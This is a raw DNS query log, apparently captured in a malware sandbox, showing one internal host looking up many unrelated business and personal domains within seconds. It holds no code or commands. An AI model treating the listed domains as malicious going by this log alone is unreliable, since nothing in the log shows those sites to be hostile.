                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.508162022 CEST192.168.2.38.8.8.80xfaabStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.515523911 CEST192.168.2.38.8.8.80x9a58Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.517592907 CEST192.168.2.38.8.8.80x3fccStandard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.520961046 CEST192.168.2.38.8.8.80x70bcStandard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.543180943 CEST192.168.2.38.8.8.80x3692Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.559680939 CEST192.168.2.38.8.8.80xe4e9Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.585016966 CEST192.168.2.38.8.8.80x459fStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.591887951 CEST192.168.2.38.8.8.80xde7eStandard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.700911999 CEST192.168.2.38.8.8.80xe462Standard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.702816963 CEST192.168.2.38.8.8.80x217eStandard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.709716082 CEST192.168.2.38.8.8.80x27f4Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.734734058 CEST192.168.2.38.8.8.80x8021Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.842202902 CEST192.168.2.38.8.8.80x9f75Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.843631983 CEST192.168.2.38.8.8.80x8cf4Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.903060913 CEST192.168.2.38.8.8.80x6c48Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.954500914 CEST192.168.2.38.8.8.80x9783Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.979989052 CEST192.168.2.38.8.8.80x2c06Standard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.986773014 CEST192.168.2.38.8.8.80x428Standard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.031507969 CEST192.168.2.38.8.8.80xc714Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.039540052 CEST192.168.2.38.8.8.80xadb9Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.057503939 CEST192.168.2.38.8.8.80xa092Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.059802055 CEST192.168.2.38.8.8.80x1060Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.062400103 CEST192.168.2.38.8.8.80x81d6Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.064496040 CEST192.168.2.38.8.8.80xb9e5Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.092776060 CEST192.168.2.38.8.8.80xea9bStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.122637987 CEST192.168.2.38.8.8.80xce3eStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.188839912 CEST192.168.2.38.8.8.80x5a9fStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.191214085 CEST192.168.2.38.8.8.80x6494Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.220371008 CEST192.168.2.38.8.8.80x17a0Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.234261036 CEST192.168.2.38.8.8.80xdf0cStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.269826889 CEST192.168.2.38.8.8.80x5770Standard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.289659023 CEST192.168.2.38.8.8.80xa1faStandard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.321593046 CEST192.168.2.38.8.8.80xaa2Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.328293085 CEST192.168.2.38.8.8.80xdf50Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.339572906 CEST192.168.2.38.8.8.80x4c82Standard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.368777990 CEST192.168.2.38.8.8.80x7d97Standard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.371762037 CEST192.168.2.38.8.8.80xd74fStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.381411076 CEST192.168.2.38.8.8.80x2831Standard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.410067081 CEST192.168.2.38.8.8.80x65bdStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.421530008 CEST192.168.2.38.8.8.80x492fStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.446010113 CEST192.168.2.38.8.8.80xdde4Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.447773933 CEST192.168.2.38.8.8.80xc6bcStandard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.450776100 CEST192.168.2.38.8.8.80x72cbStandard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.502477884 CEST192.168.2.38.8.8.80x75eeStandard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.537738085 CEST192.168.2.38.8.8.80xe7f4Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.563378096 CEST192.168.2.38.8.8.80xe4e9Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.565063953 CEST192.168.2.38.8.8.80x5b56Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.566919088 CEST192.168.2.38.8.8.80xfc20Standard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.595495939 CEST192.168.2.38.8.8.80x6f65Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.606498003 CEST192.168.2.38.8.8.80x3fbcStandard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.612205029 CEST192.168.2.38.8.8.80x432Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.618957996 CEST192.168.2.38.8.8.80x7ebeStandard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.660145998 CEST192.168.2.38.8.8.80x53d1Standard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.662596941 CEST192.168.2.38.8.8.80xb4dcStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.719254017 CEST192.168.2.38.8.8.80x27f4Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.792057991 CEST192.168.2.38.8.8.80xcb15Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.821115017 CEST192.168.2.38.8.8.80x85d0Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.828668118 CEST192.168.2.38.8.8.80x14dfStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.834377050 CEST192.168.2.38.8.8.80x4181Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.854710102 CEST192.168.2.38.8.8.80x803Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.896231890 CEST192.168.2.38.8.8.80x9284Standard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.912938118 CEST192.168.2.38.8.8.80x4871Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.016362906 CEST192.168.2.38.8.8.80x1a75Standard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.064321041 CEST192.168.2.38.8.8.80x2ff8Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.067534924 CEST192.168.2.38.8.8.80xf434Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.115629911 CEST192.168.2.38.8.8.80xa5e6Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.135071039 CEST192.168.2.38.8.8.80xf7edStandard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.266700029 CEST192.168.2.38.8.8.80xbf51Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.279536009 CEST192.168.2.38.8.8.80xdf0cStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.286217928 CEST192.168.2.38.8.8.80x9022Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.299092054 CEST192.168.2.38.8.8.80x8e75Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.322577953 CEST192.168.2.38.8.8.80xdc6aStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.326136112 CEST192.168.2.38.8.8.80x84ecStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.353458881 CEST192.168.2.38.8.8.80x69caStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.390022993 CEST192.168.2.38.8.8.80x5dcStandard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.440067053 CEST192.168.2.38.8.8.80x748bStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.479183912 CEST192.168.2.38.8.8.80xaecaStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.495322943 CEST192.168.2.38.8.8.80xbd77Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.501183033 CEST192.168.2.38.8.8.80xfc97Standard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.504015923 CEST192.168.2.38.8.8.80x7736Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.505703926 CEST192.168.2.38.8.8.80xbd95Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.564502001 CEST192.168.2.38.8.8.80xf0acStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.599140882 CEST192.168.2.38.8.8.80x5ef5Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.612807035 CEST192.168.2.38.8.8.80xf433Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.623298883 CEST192.168.2.38.8.8.80x432Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.634290934 CEST192.168.2.38.8.8.80x8db1Standard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.657079935 CEST192.168.2.38.8.8.80x9026Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.671524048 CEST192.168.2.38.8.8.80x4749Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.678123951 CEST192.168.2.38.8.8.80xae8Standard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.680305958 CEST192.168.2.38.8.8.80x11e2Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.704220057 CEST192.168.2.38.8.8.80x4364Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.711883068 CEST192.168.2.38.8.8.80x32fcStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.747900963 CEST192.168.2.38.8.8.80xf2bfStandard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.779524088 CEST192.168.2.38.8.8.80xcb15Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.798681974 CEST192.168.2.38.8.8.80x53afStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.821599007 CEST192.168.2.38.8.8.80x15f6Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.844592094 CEST192.168.2.38.8.8.80x5f64Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.879457951 CEST192.168.2.38.8.8.80x9c8dStandard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.923441887 CEST192.168.2.38.8.8.80x7fc8Standard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.942991972 CEST192.168.2.38.8.8.80x4b77Standard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.943053961 CEST192.168.2.38.8.8.80x3fc8Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.956855059 CEST192.168.2.38.8.8.80xbca9Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.004215956 CEST192.168.2.38.8.8.80x2a5dStandard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.108309984 CEST192.168.2.38.8.8.80xe1a2Standard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.191656113 CEST192.168.2.38.8.8.80x7ab3Standard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.237600088 CEST192.168.2.38.8.8.80x8a91Standard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.271794081 CEST192.168.2.38.8.8.80xc673Standard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.292716980 CEST192.168.2.38.8.8.80x3857Standard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.300539970 CEST192.168.2.38.8.8.80x20acStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.323867083 CEST192.168.2.38.8.8.80xa90dStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.326015949 CEST192.168.2.38.8.8.80xaa2Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.346362114 CEST192.168.2.38.8.8.80x6698Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.347124100 CEST192.168.2.38.8.8.80xc0ebStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.351824045 CEST192.168.2.38.8.8.80x9c55Standard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.395663977 CEST192.168.2.38.8.8.80x8736Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.408651114 CEST192.168.2.38.8.8.80x44ddStandard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.459158897 CEST192.168.2.38.8.8.80x506Standard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.459511995 CEST192.168.2.38.8.8.80x673eStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.481864929 CEST192.168.2.38.8.8.80x300dStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.489706039 CEST192.168.2.38.8.8.80xc30cStandard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.518661022 CEST192.168.2.38.8.8.80x8083Standard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.523930073 CEST192.168.2.38.8.8.80xbe03Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.585772991 CEST192.168.2.38.8.8.80x5a55Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.589557886 CEST192.168.2.38.8.8.80xf3d6Standard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.598577023 CEST192.168.2.38.8.8.80x1856Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.623092890 CEST192.168.2.38.8.8.80x432Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.645561934 CEST192.168.2.38.8.8.80x5118Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.655116081 CEST192.168.2.38.8.8.80x9e70Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.660844088 CEST192.168.2.38.8.8.80x1717Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.665168047 CEST192.168.2.38.8.8.80x2e87Standard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.688306093 CEST192.168.2.38.8.8.80xc552Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.688355923 CEST192.168.2.38.8.8.80x4412Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.689269066 CEST192.168.2.38.8.8.80x476dStandard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.689527035 CEST192.168.2.38.8.8.80xe81Standard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.695686102 CEST192.168.2.38.8.8.80x4749Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.804125071 CEST192.168.2.38.8.8.80xb071Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.806083918 CEST192.168.2.38.8.8.80xecdfStandard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.872688055 CEST192.168.2.38.8.8.80xb13cStandard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.890368938 CEST192.168.2.38.8.8.80xd135Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.130230904 CEST192.168.2.38.8.8.80xd45aStandard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.189002991 CEST192.168.2.38.8.8.80x2a81Standard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.238805056 CEST192.168.2.38.8.8.80x8f1bStandard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.298878908 CEST192.168.2.38.8.8.80xbaacStandard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.308535099 CEST192.168.2.38.8.8.80x480cStandard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.325876951 CEST192.168.2.38.8.8.80xdf0cStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.369987965 CEST192.168.2.38.8.8.80x379bStandard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.397133112 CEST192.168.2.38.8.8.80x65b4Standard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.420556068 CEST192.168.2.38.8.8.80x5028Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.455557108 CEST192.168.2.38.8.8.80x6c93Standard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.486471891 CEST192.168.2.38.8.8.80xcdfcStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.502538919 CEST192.168.2.38.8.8.80xdd49Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.502538919 CEST192.168.2.38.8.8.80x7d9bStandard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.518461943 CEST192.168.2.38.8.8.80x868bStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.534323931 CEST192.168.2.38.8.8.80x8e2bStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.536770105 CEST192.168.2.38.8.8.80x1de2Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.549411058 CEST192.168.2.38.8.8.80xa0fStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.559541941 CEST192.168.2.38.8.8.80x875Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.561292887 CEST192.168.2.38.8.8.80x3399Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.565567017 CEST192.168.2.38.8.8.80xee1aStandard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.581371069 CEST192.168.2.38.8.8.80x82b9Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.584624052 CEST192.168.2.38.8.8.80xffabStandard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.584706068 CEST192.168.2.38.8.8.80x62fcStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.589374065 CEST192.168.2.38.8.8.80xe4c4Standard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.606960058 CEST192.168.2.38.8.8.80x1856Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.611694098 CEST192.168.2.38.8.8.80x2782Standard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.626738071 CEST192.168.2.38.8.8.80xc536Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.669836998 CEST192.168.2.38.8.8.80x1717Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.670147896 CEST192.168.2.38.8.8.80x9e70Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.688559055 CEST192.168.2.38.8.8.80x4bb1Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.714543104 CEST192.168.2.38.8.8.80xdb7eStandard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.716450930 CEST192.168.2.38.8.8.80x4749Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.718732119 CEST192.168.2.38.8.8.80xcc63Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.781404972 CEST192.168.2.38.8.8.80xd9e5Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.863241911 CEST192.168.2.38.8.8.80xb352Standard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.969990969 CEST192.168.2.38.8.8.80x8a1dStandard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.080965042 CEST192.168.2.38.8.8.80xa444Standard query (0)at-shun.comA (IP address)IN (0x0001)false
